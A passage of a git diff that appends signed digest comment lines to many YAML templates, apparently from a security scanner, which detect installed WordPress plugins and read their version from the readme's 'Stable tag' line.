4a0a00473045022100eb1e8fbfe6d296b9cff5e0acfaa9f049b14cd5d473741ed59910a57eb02ba3a302202526cfe4ee39b175ae024d9f94561c2d763b88a24e8c8a982fe32cc9a5cc7430:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..24d02d6e87 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220616555c2fe19ef84dff617dec3efc7de66e9dc15f2671c485470652640479872022100a5722db82d6de378132a458f427a104fc8e9ee822e8fa7517e2bcd8c33499b5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..97f6b92abb 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210095e2bcc157a54700af0a2ddaa160a6f47e38bf0cefbdbfbe1035c400a888d21002200e98d2c7f526d64286580146da0615d92c2b2fa426c80589282284b5230e1dc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..726d86e9f9 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b6eb57784dd16537369876b2ff5f11a65ccf77ba38a75106021af81d25b264bd0220069806d282d36c29fe5b6e0897d1b4a5847bc2fcd7b1f132dbc98e16d35d154a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..dcf8274756 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e9635e8264045d6b5083462c542cbbd5ca7640154f008e7dc67654784ab949d8022100fcec7ed0c747447e9d14cfd98dd735474fb2360fb00087bdf5faa05973d3ad8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..ecacdb57bc 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d1cfa5e4d81eb9db57fa9e3aa32f660817a2000011eb508e96bad8e7d6c60d47022100bbb559f9eb9b3a190a7e829b9e0fc05b1adf209e504510d4b5034155be855486:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..c4ad2e3a9b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201808b1eae26c3a7ce14636373d02ce88d4282a466b1948c98146e8d0373bec70022100af2754f8db6f9e6afff6135f0c464f587da4a09ea27d84edcc03f56491441934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..46d2e51287 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201966318daf97e10fff4b9b2df130c67bbc1d1c0fbcd03a5145d6c29d32c5fc78022100c4976cb6521a92c66c8775b15e74910a0536600e0b4a2a6a7086a8ae2001afac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..0843edc8f7 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100af693881ca89da4aae59fe2e8d7033d71e25a1abe64e7652146b2242257193be022010ea666c2f7bc81ebd2474b0acd35fafc279ba97f38ae8f9ec8687a99574ef58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..7f4e4a38ae 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022014718c96e441c1b9e4962a7d5c29bd84bb08ed78bcf9b0b82dc13414720017d7022100d4f980f90670b3c7fec89b1c1f19ed4611b0f63b4fd57dec03c06489927fe019:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..6b4c27b3d8 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022004901fbd41d0ecc2f2645b68a3edc9b905e62e20d1116ff745f3d4d5c0b01689022065ba3e0371cd96c0398a91eaff70c34a3f19351658efdeda49cafe574f0a606e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c20ed6552a..9d7774de22 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200cc8ad83e63310558442d79e957d6587a485362e8d5a7c546b261b43b3f2dbe0022100b7b02f36ed0c0578dd2db1855071d3a66eeb140e18f4d0526c61a33f930c3575:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..1ecb509f7f 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210095818d15e7e1c51908b2017bf5dda59a9be8e26ef8f9d794b34f81b3730d5250022075b4d11d7fb2e544aae98ad0b6fc9e2ebed806eec47c145ef4bb19764f851703:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..1b8a36e56d 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201b6af8acf20eb9a85308df1379870d1ce32e55f0abaf492548c948da5e2aa08a0220694e3b0bf84dda2f44a1ef824ea9ced1292906eb8083c6a918f1e5978b4f3fa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..cadfd01714 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220673064845a91119352b8388cc376bb6e062bd24c4dbd463c9cc373359a7a021d0220762888352cab5dc1f92e526cfd9b99493e2ea02cf19b26365e84dd881fd149fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 38391bd9f3..341287c9e1 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205e3d47731d765ee71c9ed9a3ffa2b24ace9cb710e6fa4fa90e904fea5b25643c022100d7d84692f10f9f6b087c8cf94b956743b20a86e67177ffe6f3a33b133cafc96e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..bd1098f136 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200b2c874ca7fb5f89f3f10ec4b11096110eb65da9e98f25b34461db71cc880b970221008f445b3582a68a4384218b33d1fc56f6c2af14e9332cfbcd02e915e76442fd58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..e90db8cea2 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e562c838d0afc3cca8828b3ae82835a394cc7336e223917e7a4c5e01a55c4caf02210084d2d40d382a9a4e73aad1a59fcf1c0fb1cb2d29f37f30580d4c436bc097643a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..8f1442bc1e 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210085e144ebe09401f0860ff9262782d84d42a2eec9fce55d1b80876600dafa80f30220326f9c0cd33c594772b649de5f21128ff0e88ff442644557f6b3bde9e9be5859:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..13e6b533b8 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b69294d21efbeacaf8dcf5de3aaad83ee56b8914a37970eda8a31d40fa56088c02200cad8e84ad0783bcd93d9cf6ed2fd5f823e0a44ebe3be6f918e16576b9058743:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..a49996809d 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203edc693f651430a53787cec4139841df283ded63caedca100e85d74d781475dd022100e8bf1b77ef4c1f546c40fed357acb0bba24edc3f8bf43d55503cdb0106f4331d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..86133f776f 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e82048a94760e290fc58b06038f4a5a7ec7d9f650560fd5a9cc18e09ed449e13022100a3465fdc16589410f371ca4f5962036eadbecbb06d79b2bc0db6c7c769e087bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..eda6319997 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201f546e30cbcbc256285303254c5ed5cff76a3dd7a2bdf3fc413ce4013a262ebb022100caa49bf2c964fbb00086cb167f758b1a9c9e2fb61f1db78010971a6c4e5025e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..826f7d8b66 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022069c60f6305660b2b3a0312729c97b0ac394e4fdef0782aaacbd4e27b6e36b14f0221008fd5cae9a48a0382c3ac0d245898d02c5c6caf0808abef87491c5c97d056ded1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..65c11b3422 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d6707556020e7434d5554f3ccc3c6445aeaf934b9485df130951482870ca76e5022100f6a7908858d413cf096d08c2ae2057ed34a0405a684251fcadcd2cb85e1fa145:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..6e50bc1404 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f5b37cb0892154113671d5114242fa788a721615c2c8289424dd537bd5d1932c0221008cb14ae51dda6f5c3b6243d4dfe69a3e52984d261ed6276c3522c3a9cf9f5134:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..45262f7340 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202e4ec0d08de6d47fbc299a22a289ccd74e515ebe94e3178674840028b40d19200220566318575fb3f1e85f9fdf1fd871327fc371ac3c65c80d4a598a57c9f94ca0f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..f45a438e40 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022062a93088fe25103a4e0e9b75599455fdcd739914a818f83bc52c0e06d4b06a420220221ac7e0a0aa2849a1b1f72bd133a5c5955e416bc1f4294066a0592296b82dcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..14505ca911 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100acf7013c8f9c9faaaca7f585991b49534d00832440e2f9c4a65ca85792a8df6b02206d5527ac39a0b8786be011644d0e2ee3fdc29ef7163c8443b55f35ad5c4a2a38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..68657c9af9 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022058d2d8fb42fb3932dcb340bbcf41c00241c9856179a9be9964ee8971a8675895022100dfa379ecf00e0972a11c489d28219e884a1487dd7f55e940a12c1cceb2efdc6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..a441a9038c 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a7719008ee6655fd674a8f5754dbb4cbb94259157d2b15fbb2fe651f2246c90c0221008199f9bd2e2e2c402c2a1e4512717ba3d46cec0a2d639006b443a0e94f032e3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..a4d82d9f4f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008aee7f7412013f95a1c73e4128d2ce63a640a9a0d3b1c0abffe2734858199851022100e0364b110f6242be1184e4051a12c99b302a3038e0ce359479753115de72073a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..53d5907fa7 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a9c2a0b45c1c059201286f2edf3493121a41284a3b08b548b0ffba2cd0af495202203d97fcaab9f6ebdffc8b6ea327eba4104f97de855b60424555b45fc60b438005:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index e83e8d79e7..93718180af 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ac049911eec8229c0a6b272077d959fe3a3019db461a28c6b224e48d804b8b6b022100a06830adee7ee99705836d70a35ee3e766176e62ecdfe443aa1a5afb89610cd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..5735b0c39b 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100843e4d6cb7d4a570e548e402c61c4a2eaea5731939d620105eb161e102a8dde202203df7e9d0d33fffbb8d1e0ece5f60898b809605760f255bbf99e0911ff91ef851:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..ee2d0fbc6a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f276c57a57d0f222d0a7ceb0613eb7287da33b602ba28af09802db4720a87cf70220073ff02d110b32856c063494eb4a88c85b028df62366da62ceb111622cc5ea2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..e1c63521aa 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200f2f827f5ba70a7f9b69e0af11a1268c82b07fbac66b887dae6974b343084197022100c892272f04f4017c27fb857995e5148181d28accbd5baeb9978394edad4b7233:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..168fe2a84a 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205e78cb7493d811e1f644469f09586bb68a5904b82ed8893e617bc0460ef15a21022100f4399115613d9f3cb9a89434f658d1e1e6efc6caa5fb5b2b5eea4daa7284bf6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..4e778e70d4 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022055090c452a4e1c00bce02cd115085eba262336a32d779ff6d3fb330a244bcb2902203d806ec592b96d9eee5b9e1f7dbc3f118a72d67187ce34c4c59a5d46fe458736:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..1ae6610241 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009c5e65aaeeb0358fa326f598e24b62d0fbea59e7ec0f4a2fd8331693fab4219a02202d52748eb369a290713bd6e000b7a9f716b5bb5820f6632467ecece6420281e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..87127ee06e 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009dfd02fb0065bb01d2c809844cb913ace1a51f3a27cfd466e49968845e8fcf370220424b8bcc5e1524d74e2c407777d97c0446674ab3a067571c7bf65d3362730faa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..802176a6f9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202e12594e3dd9f6f8f59f993e16368a397c88257375a507a61d65cf218346f5af022100b3a6dab066176c8142958d8b08e7c08ae545bea00eefef9c199811141195de51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..5a7b337328 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207574f851b4ea5cb3448b1301acbd81a44b09e7fcfbfd341ef680a44dea630229022058d84dbd07cd530bfadd25493eef59d27f9ad8c72ad101089fb78cc790947cc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..aefa11783f 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c33ab9a31d9c797e11298547605a2efb1c4d730bdb46544481174b8ae8620bcb022100ee6bdb6f99dea48a396fe239c9873090bea470576fff51cf49eb2e79fa52184c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..feabdfd1dd 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203df8304ab0b06bef72797f798f661fc2b62bf6e1ad115e53f11397884c300b5e02203d537c30b823070c36b56abb8774b541d5fd49eb2c312f6bd1adcd357401c8bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..23223d2839 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204c83107b4dfad6114f54dd4d892cd05f28f908c59448f857f6461456991c197d022100b2f6c39dd076a79ffb194e8b1adbff7b34c33eee3c2eae4b1616fe2d248d2a14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..f25ec120a0 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 